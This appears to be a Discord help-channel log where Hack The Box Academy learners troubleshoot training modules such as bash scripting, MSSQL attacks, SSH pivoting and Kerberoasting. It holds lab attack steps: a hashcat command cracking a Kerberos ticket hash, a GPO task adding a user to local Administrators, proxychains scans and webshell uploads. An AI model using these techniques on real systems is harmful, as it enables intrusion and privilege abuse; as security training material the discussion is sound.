this means that it is not reachable right?

menu bar

Sorry

not search bar

also it's called the 'terminal'

i'm not support staff, reach out to support if you're having issues, make sure you're not using multiple vpn connections ip a if you see multiple tun connections, then you're running too many connections

thanks

try searching terminal

this ?

the $_ icon as i said

Hi.. Where can i ask for help resolving a task regarding
Introduction to Bash Scripting?

also that's the search bar; not menu bar (at the top) right next to powershell, is the terminal

there's a wifi hacking module, but it won't teach you to specifically hack your schools wifi

yes

ohh okay

you can ask here, but since the module is above tier 0; don't reveal module content such as scripts.

you can generalize your question with the module/section and what you're attempting

Ok. Im having prbolem whit a for loop.. It feel like im missing som part of the information but i cant understan if there is som hiden data over tha question or if there is only to use the data in the question.

Becus all the awnser im getting is wrong.

Im using the Exercise Script whit the question info

https://academy.hackthebox.com/module/21/section/128 ?

break the question down because it's asking for several things

https://academy.hackthebox.com/module/21/section/132

ah yeah so the loop should already exist in the script

you just need to input a conditional (if else)

stuck again.. I have tried all the commands from the page witht the target ip and also nmap with various scripts to get any info but I don't seem to be getting anywhere.
Module name/link: FTP Footprinting, https://academy.hackthebox.com/module/112/section/1066
The question:
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
I can give more detail on what ive tried but I don't want to get the message deleted

Hmm.. Ok im doing it but the result im getting is wrong. Hmm will try som more

you need to check if the counter equals a value then it should print the length of that

as a note : echo can add an extra character, so be careful with that

what is index number ?

man ls

I dont find it maybe I didnt read it well

the option may not be called "index/--index" but searching for index yields results

to search within the manpages you can do /searchterm [Enter]

Okay found it tysm

Can i typ the result im getting.. Or can i post the code whit out the result so i can show what im doing . becus im juts getting that its wrong

no

if someone is willing it can be taken to dms

uff.. okk.. Hm then im stuck. Becus i cant se where im doing it wrong..

i'm getting the expected answers; it's likely you're off by one

dm me

In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer.

answer: 7.5.0

still says wrong answer

you sure its not 7.5.0

happend to me before it didn't accept an answer because there was a space

Hint: re-read specifically what the question is asking for

ig its not the space then😅

correct it's not 7.5.0

the question ask for the edition

ah yes

im always exagratting

there's a nice little thing there that tells you the edition if you hadn't figured it out

i did when i read this

im always thinking inside the box

"it has to be 7.5.0 but the answer thing is broken" my mind said

I remembered this question because I remembered getting hung up on the same thing 😅

what is xxd binary ?

https://linux.die.net/man/1/xxd

https://tenor.com/view/google-exists-google-search-it-geekboy-geekboy-cz-gif-25933207

high level response

that's hard for me ahah Im learning alone

its ok

it ask this

and I'm lost

reread the section im pretty sure its there

env

there is a command that should show where its located

nah there something easier

Pair it with grep ?

which

Wait isnt that spoiler

Ah yes

also locate

I thought its a library not a binary

it's not

also it explicitly tells you that xxd is a binary

Idk what module is that but i think i did it

Still didnt learn

Linux Fundamentals

linux fundamentals

bro im so lost I'll try to find someone who's french to explain me in voc

One needs practicing to keep the memory updated

Module: Introduction To Assembly Language
Section: Skills Assessment (Task 2)
Section Link: https://academy.hackthebox.com/module/85/section/909

I am having a terrible time with this one. No matter what I try, I simply can't get the flag.s to produce the right Shellcode. I keep getting the Failed to run Shellcode error. I have no idea what else to try here, honestly. I would like to get this done. Can anyone help me please?

locate xxd or which xxd

both will provide answers

which <binary> tells you where a binary is located (if it's in your path)

https://linux.die.net/man/1/which

locate will just show any path conatain xxd

this is why which is better

correct

ohh

I write xxd but now im blocked in this mode

which xxd
all it's asking for is the path to the binary

this will provide that

yeah but in the terminal

if you just type xxd you enter in the "interactive" mode of xxd

before u told me I wrote "xxd"

ctrl+c

ohh ty

@golden gate don't spoil the answer directly

let them get to it on their own

i mean he already saw it
my bad

which

not wich

mb im tired

happened to me before lmao

okay I found it

https://tenor.com/view/giyu-gif-20991911

congrats ig

uhh the next step is hard I'll find a french coach

tysm for help

man up

what does it ask

I dont want the answer I want to understand

reread the section its there

for the above one google about regex

find is helpful here; and i beleive the section talks about how to discover files with extensions

so long as you're ssh into the target system, that should work

though you may want to count them

wc has a way to count l ists ;)

you may also want to throw errors to the void

2> /dev/null

this is because your stderr will be flooded with "you don't have permission" messages

There we go, I feel so much better now! Time for the SOC Analyst path finally!

@cyan arch the module is above tier 0 please don't post module content, you can ask questions without spoiling content

ahh okay apologies

Im stuck on this module. I have tried all the commands from the page witht the target ip and also nmap with various scripts to get any info but I don't seem to be getting anywhere.
Module name/link: FTP Footprinting, https://academy.hackthebox.com/module/112/section/1066
The question:
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
I can give more detail on what ive tried but I don't want to get the message deleted
If anyone has some tips would be much appreciated

Did you try connecting to it?

yes using ftp <ip address>

Hi . I am stuck on this question: Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable for module https://academy.hackthebox.com/module/21/section/128 - bash scripting.

I keep getting the exact same error after changing multiple things.Any help?Thanks!

Well, did you log in?

Echo can add a newline character, -n prevents that, there are multiple ways to grab a variable length

${#var} or echo -n $var | wc -l

After the loop: you need to assign the $salt to the length

hey im absolutly banging my head against a wall. With the file uploads attacks skills asessment, what timezone is the htb server in? i got everything up to the last part of actully accessing my uploaded webshell. I found the source code and the dir, plus the nameing scheme, but no matter what i do for the date i am getting a 404

Guys hello if someone has done cracking passwords with hashcat how to open archive I extracted hash and cracked the password but archive itself is not opening

as I understood flag is inside

i downloaded the archive clicking on it and it doesn't ask me for a password or show that it is locked with a password

unzip in command line

Eu/uk gmt

awesome thank you

anyone know if John has a module for vhd files

don't see any vhd2john

No, because vhd wouldn't be the encryption

oh maybe I know why

it's windows prompting for elevation

file file.vhd

ok makes sense

It's not about windows prompting for elevation

thanks, i've got it now, it was to do with the newline character, i believe I did something similar to echo -n $var | wc -l

like when I tried to open on target machine, Windows local Administrator prompt came up

I just need to mount on linux

Thats because mounting drives requires admin permissions

The file is still password protected

There is a 2john that will be helpful, but you gotta discover the encryption and hashing in use

grrrr its still not working. I got the base64 encoded response in burp showing it uploaded, and im in the right file dir but i cant for the life of me get it to come up

spent a whole day on it

Run the command in php to show you what the filename command does

goood idea ok

In the leaked upload.php it does something to mutate the filename

yeah i found the source code for that

one sec

the heck

yeah im putting that in and it still comes up as 404

im so confused lol

hmmmm

yea found it, pretty neat didn't know you could crack that

I guess on a real enterprise system the encryption would take much longer

when i try to unzip the archieve I get the following

unzip Downloads/hashcat.7z
Archive: Downloads/hashcat.7z
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of Downloads/hashcat.7z or
Downloads/hashcat.7z.zip, and cannot find Downloads/hashcat.7z.ZIP, period.

that means archive is corrupt or what?

Web Attacks
Mass IDOR Enumeration
https://academy.hackthebox.com/module/134/section/1186
It's only one question but I can't seem to curl the uid of the other users

Is anyone having an issue with the attacking sequel databases module in the attacking common services topic for the CPTS? I’m using.Sqlcmd and it refuses to connect. I was able to once, it there was no data in any of the tables

@flint palm That error means that the file you're trying to unzip isn't actually a ZIP file — it's a .7z file, which is a different archive format used by 7-Zip. You're using the unzip command, which only works for .zip files. To extract a .7z file, you need to use a tool that understands that format.

sudo apt install p7zip-full

7z x Downloads/hashcat.7z

Thank you

Anyone good with binary exploitation ?

No, I get this, am i missing something?

try restarting your target or checking if it's still up in academy

Hello, I'm a beginner and currently following the "Path Information Security Foundations". I've tried several times, but in the part where you need to set up your first Parrot lab (which I chose to do on VirtualBox), I don't understand why I get no result when I type the command cat tools.list.

The system replies:
cat: tools.list: No such file or directory.

I don't want to move forward without understanding this

worked, thanks alot

the file "tools.list" doesn't exist. You can't read the contents of a file that doesn't exist

I thought it was supposed to exist since, while following the module, they show the command without really explaining what to do. So I spent quite a bit of time trying to research and test things, but now it's clearer thanks to your explanation. Thank you!

They show a file with a list of things "tools.list" but it's not a default file

It wasted a lot of my time. I need to focus better from now on.🤣

Anyone having issues too with the attacking SQL database’s module?

what exactly is your issue?

can connect to the lab (Attacking Common Services Attacking SQL Databases ), but there's no user table. I've already answered question 1. I've been talking to support all morning and I'm still getting nothing, but problems. Went over the SMB module and the SQL module for the past 6 hours to see if I missed something and I'm still getting the same issue. MSSqlsvc user password doesn't work to login. There's only the same 6 rows (master, tempdb, model, msdb, hmaildb, and flabDB.) 3 I have no access to (flagDB, hmaildb, & model). Master, tempdb, and msdb I can and there are tables, but there's nothing in any of them. master(spt_fallback_db, spt_fallback_dev, spt_fallback_usg & spt_monitor)
tempdb is empty
msbd (dm_hadr_automatic_seeding_history, backupmediaset, backupmediafamily, backupset, backupfile, restorehistory, restorefile, restorefilegroup, logmarkhistory, suspect_pages)

You should be able to log in with the svc user

Tried that. Keep getting a mssql: login error: Login failed for user 'mssqlsvc'. error.

well if it's a local account, you may need to take that into consideration 😉

mssqlclient.py --help

Do I switch users in my current session? I went back and tried xp_cmdshell, writing a local file, reading a local file in sql, impersonating a user and there are no other users, and nothing.

One sec while I try that

you can just log with mssqlsvc

sudo python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py mssqlsvc@10.129.203.12
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 96, in <module>
ms_sql.connect()
~~~~~~~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 540, in connect
sock.connect(sa)
~~~~~~~~~~~~^^^^
OSError: [Errno 113] No route to host

no route to host

are you connected to the vpn? and by extension, is the host up?

yes, it asks for the password before attempting a connection

Yes. I've used both my VPN TCP & UDP, used the pwnbox and the errors are consistent no matter what I use

well OS error isn't anything to do with the target itself, at least not directly

you're getting a "no route to host" error => it's not able to connect at all; not that the target isn't accepting the password, which would be a different auth error

do you only have 1 vpn running; are you using the pwnbox at the same time as the vpn (if so, don't)

Yup. I've been alternating and not running multiple connections. I did do that yesterday, which I thought was my problem, but today I've been testing 1 at a time

change vpn regions -> respawn target -> (there's -windows-auth for mssqlclient that tells it to use local authentication)

finally it worked! Many thanks for the help

Hello!
Module: Pivoting, Tunneling, and Port Forwarding
Exercise on Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling

I'm unable to scan with proxychains nmap during the exercise, though xfreerdp and msfconsole work fine with proxychains. Nmap returns no results for any query, even with full TCP scan flags.

Why is not working?

try to add the -v flag to your nmap scan, maybe something will show up

also, windows defender blocks pings so maybe try to add -Pn to your scan

If your question is related to a module, just ask it here.

i need help with binary exploitation rightnow anyone can help please

Best to say the module/section/question you're stuck on.

Has anyone that has completed citrix breakout now what the issue is here? The created admin does not have the ability to execute the UAC bypass script as illustrated in the provided solution.

Double check your command in comparison to the module, it's not the same.

Also ensure all prerequisite steps were followed.

@ruby aurora please read the #rules and do not DM users without permission

Question about the NFS footprinting
when doing the mount cmd against the target is it best to just grab the whole directory and dig for the flags or could you just grab require sub folders?
i dont really need help, it's a best practices type question

I am not sure if this is the right chat, but I am trying to do the Module Linux Fundamentals.
I am currently stuck on the System Information part. It is telling me to connect to the spawned target machine with ssh, but I am unable to figure out how.
if this is the wrong chat to ask this question, could someone please driect me to the correct chat?

Ok sorry

I would think it's better to grab only what is needed for the sake of avoiding exfiltrating irrelevent files that could be sensitive or trigger edr but thats just me

You will need to use the Pwnbox or your own virtual machine connected to the VPN. From there, you should be able to use the command in the terminal ssh <user>@<target ip>

Thank you. I am using the interactive terminal provided.
I clicked on the bash terminal.
how do I get the target ip?

Below the pwnbox in your browser (right above the questions) you can press "Click here to spawn the target system!" and it'll change into an IP when it's spawned

Really? The errors seem to suggest that the issue is permission related. I'm almost certain I haven't missed any steps

I'm not entirely sure, but that command is not what they provide and not what I have in my notes. You could have also missed some prerequisite steps too.

If you're referring to the last comand in the screenshot ik that it is different from the provided solution. I tried this syntax because the prior command doesn't import the module as expected

Thank you very much. That did the trick.
Again, thank you.

Thanks for the reply Aeshmedai. I have tried two different mixes:

1. -sn -v for host
2. -v -Pn -sT for ports.

I tried a bunch of flag combos, and the only one that smiled back was -sn -Pn. Totally redundant, due contradiction, basically like high-fiving myself in a mirror—but hey, it was just for fun and desperation.

I know that the ssh command is ok, as other tools as freerdp works fine. Is only nmap

ok send me a DM and maybe i can figure it out

I am trying to do the frist question: Find out the machine hardware name and submit it as the answer.
I used the uname command and it gave me Linux but it says its the wrong answer.

Try displaying more info, you can add an argument to that command to reveal more info.

I got it. Again, thank you.
This is my first real time using Linux, and am trying to learn it.
I had to add -m to uname to get it.

Hello, I need help on how to execute the vuln in PDF web application in Final Assessment of modern web exploitation techniques, I was able to configure the hosts file in webmin and also running the dnsrebinder, but still showing "internal server error", but when I restarted the dnsrebinder and reload the page, access "http://attacker.com/" only redirect the page to what should be the output to get the flag.

nvm solved it.

Hey guys, I working in the module "Kerberoasting - from Linux" but I can't find the way the get the password

Hey anyone have any suggestions where to start

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Should be in output files as clear text

😭

thank you for you answer! but I was looking and trying with older password like Password123, and easy passwords but nothing

Mb was thinking of the wrong section, you have to crack the tgs hash using hashcat

Im doing that right now
hashcat -m 13100 -a 0 /home/kali/Downloads/hash.txt /home/kali/Downloads/rockyou.txt

👍

Should take like 30 seconds or less to crack, if it doesnt your hash is incorrect/malformed

I'm working in the second one too!

thank you man!

How long does it take a scheduled task created using a GPO to actually run? On the last question in the GPO section of DACL Attacks II — got a GPO task scheduled to run net localgroup Administrators INLANEFREIGHT\g*****l /add, yet the GPO doesn't do anything.

It does cover that in the module I believe

Tried using bloodyAD to GPLink the OU and still nothing.

Theres a command to force gpo to update iirc

group policy automatically updates every 30 minutes, you can update it immediately with gpupdate /force

Hello, I am on Introduction to Active Directory module.
I am stuck on AD Administration: Guided Lab Part I. I have started the instance, still not able to connect to it.
Any nudge would be helpful.

• vpn running?
• can ping target?(not all targets will respond to ping)
• correct password?(looks kinda wrong)

https://academy.hackthebox.com/module/134/section/1206
web attacks
advanced file disclosure
I can't get it to read read the flag
i got this nvm

No. That's illegal and now what this discord is about.

Web Attacks
Skills Assessment
https://academy.hackthebox.com/module/134/section/1219
I actually need this right now, I don't seem to find a foothold on this

Yes, VPN is running and password is correct.
No, I cannot ping target.

I am facing a problem at Pivoting, Tunneling, and Port Forwarding -> Dynamic Port Forwarding with SSH and SOCKS Tunneling

I followed the proper commands:

$ ssh -D 9050 ubuntu@<ip> # attack machine
$ netstat -antp # shows listenning to 9050 <- attack machine

$ tail -n 4 proxychains
socks4 127.0.0.1 9050

$ proxychains nmap -v -sn 172.16.5.1-200
# response all host down 

Is it the machine problem or I am doing anything wrong, Tried multiple time after boot the machine waited 5 minutes still same.

@cold star is the ssh service running on your PWN box instance/the target?

also what module is it?

can anyone give me the correct path to linux priv esc modole + 0 Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.
this question?

are you trying to ssh into the PWN box or a target?

Active Directory Enumiration And Attacks, Privlaged Access

that's RDP not ssh

Okay Let me check

Got it Thanks Man, I was confused between the ip's. Sorry for wasting time

you didn't waste anyone's time

Thanks For The Help.

can anyone give me the correct path to linux priv esc modole + 0 Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.

oh i did it nvm 😄
grep -r "HTB{" / 2>/dev/null | head -20 with this command but what if i didnt know that flag should start with HTB

well you cant use grep if you dont know what to grep lol

yea great point

Ah i am stuck for quiet a few days for with this question of skill assesment of Hacking wordpress module
https://academy.hackthebox.com/module/17/section/64
Question- Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

hello Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?
/home/htb-student/bin:/home/htb-student/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/tmp
i got this and what is the non-default directory

Sorry been busy, if you can't ping the target try restarting your VPN, restarting the target, or changing the VPN region

Hey need help

with what @lofty lake

nothing urgent it seems

im in the introduction to malware analysis module under code analysis, im at a part where they are explaning about the api function and like just explaining the dissassembled code for that part, they are like explaining which instruction is used for 1st 2nd 3rd etc arguments for that but like it is kinda all over the place?

like in intro to assembly language it was mentioned that specific registers are used for 1st 2nd.. etc arguments but like in the case for the api function, it differs. so im not too sure if i understand it correctly now.. if someone can explain pls do T-T

or is it bc it is a disassembled code that it is like this?

The way arguments are passed depends on the calling convention

checkout the x64 calling convention documentation in microsoft it may clear things up

OHHH

okayokay i get it now

thank u both

Hello Guys 🙂
i need your Support.
Would it be better when i start with Windows Active Directory when i do the Pentester Path "AD Enumeration & Attacks" or should i do Active Directory learn first on Tryhackme?
I think in the learning Paths on THM you dont learn to use crackmapexec.. and i want learn it directly reasonable.
What is your recommendation?

I am having a problem with HTB module Android Fundamentals Native code where it will not take the answer what am i missing for this question "What is the name of the function that returns the string inside the cpp file? (Format: FunctionName())." I thought it was this stringFromJNI()

You don't need THM

Just do HTB

thx for the fast answer 🙂

WOW U ROASTED HIM!!

ah my question was deleted?

why was that?

What was your question?

about The XSS script. In which I was getting errors when uploading the payload in the URL

It probably contained spoilers

ohh understandable.
so where can I ask such questions?

You can't post any spoilers for modules, #modules is for module questions

you can ask here; just don't spoil things

i.e. my payload is still leaving behind some stuff for some reason

yep that was what was happening

but showing the screenshot with your payload in it is a spoiler

:)

okay I understand now

you may have to mess with the payload a bit to get it cleaned up

yep, I kinda figured it out.

But I guess I cannot tell what I did because spoilers right?

yes, you can't just paste your payload here

my general suggestion is look at where the payload is inserted, and work from there

alright thanks. Will try to ask better questions next time

Bumping

ICMP requests(ping) don't go through proxychains, this is what nmap uses to determine if a host is up, use the -Pn flag to assume all hosts are up, but this would make your current scan uselessly slow

Then the module have issue coz it’s literally the content I shared in my text they used -sn flag

Please can I ask someone that has completed "Detecting Attacker Behavior With Splunk Based On Analytics"? I have the correct answer, but I can't seem to get it through the way the question is asking.

Guys hello how to install hcxtools downloaded package but can't install them apt install hcxtools isn't working

the following paragraph in the section tells you that you need to be aware of the fact that Windows Defender blocks ICMP requests

and then they give you a command to enumerate the ports of a Windows target

same issue here, feel free to let me know if you figure it out.

Thanks @waxen totem and @quartz lagoon I missed out the point

hello i've been doing wordpress hacking module and i found subdomain of wp-content and it is /atom when i visited the web page file downloaded on my pc but i cannot open it and is it something that i should dig in or can anyone help? kinda stuck

Attacking AD and NTDS.dit

Got one set of creds from brute-forcing usernames and pw's - doesn't let me connect with winrm? Is this normal / expected?

Anyone have issues where sshing into the training box disconnects after the MOTD?

I'm trying to complete the challeneges in Prompt Injection Attacks module Indirect Prompt Injection

Just based on the information provided, it might be a case of permissions, presuming WinRM is open on the target

Interesting, not sure what else I could do - only set of creds I got across 3 users

I'll keep looking, could've been something with the machine I suppose

I have DM'd you if that is ok

Yeah no worries man - I'm just about to clock in to work so I can check a little bit later!

Has anyone done the pentest in a nutshell module? Im trying to privesc as john like in the lesson but I'm prompted for a password for john and cannot privesc by abusing sudo privs over nano

The password for the user is mentioned in the section

omg I was entering it wrong >:)

the true hackercore aesthetic

goonsquad ive been stuck on the last flag of linux privesc skill assessment for a while may i humbly request a nudge

who here has finished adroid fundamental native code last question

Hi Guys extracted handshakes using cap2hccapx.bin created file with them and when cracking this file getting separator unmatched error from hashcat and no hashes loaded can anyone explain why?

hccapx file also created

hello everyone! i was wondering how does password reset poisoning work?

Footprinting : SMTP
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
-> so i test 3 tools , metasploit and nmap and smtp-user-enum so meatsploit it give correct answers but nmap and smtp-user-enum it give false results i confirm that manually

https://academy.hackthebox.com/module/112/section/1072

oh okay but what’s the point of this server then?

For discussion about the various HackTheBox platforms.

I am working on the FAT GET lab in the Advanced Cache poisoning, but the only parameter language is vulnerable to XSS and ref and content does not contain XSS. Also when I add the XSS in language as html body the admin never triggers the payload.

Looks like zone transfers are allowed on one but not the other? @placid haven

I got the same problem. I tried different flags and even SOCKS5. nothing works for Nmap. However it works for xfreerdp connection and you can get your flag

when use -sT flag make sure you use sudo

eg:

$ sudo proxychains nmap -v -Pn -sT 172.16.5.19

it will work perfectly fine.

The power of SUDO... thanks for that. I tried and it worked. Still having the problem for host discovery. I am on socks5

I really want to be a hacker. But ain't know what my actual goal is or where my path is. I rearned some networking in youtube videos and something somewhere of something like not the dots connected.

I worked as java backend for 3 years to make a base what actually i want to hack. Now i want to go back to my passion and career in cyber security etc etc.

But I don't know where to start or anything.

Like there is a blank way but the goal is hacking.

Like mr Robot or something.

Anyone pro here suggest some talk?

(Dear script kiddies, don't try it with an opportunity to hack my with reverse engineering or something that will break my system and heart) 🖥️💔

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

so no one here is a hacker ?

What does that have to do with what this discord was created for?

works just fine for me. Does your payload point to the correct vHost?

yes

cloak is complete now I am writing my staps and go back to FAT GET

if you would like, post the full GET request using the spoiler tags otherwise just dm me.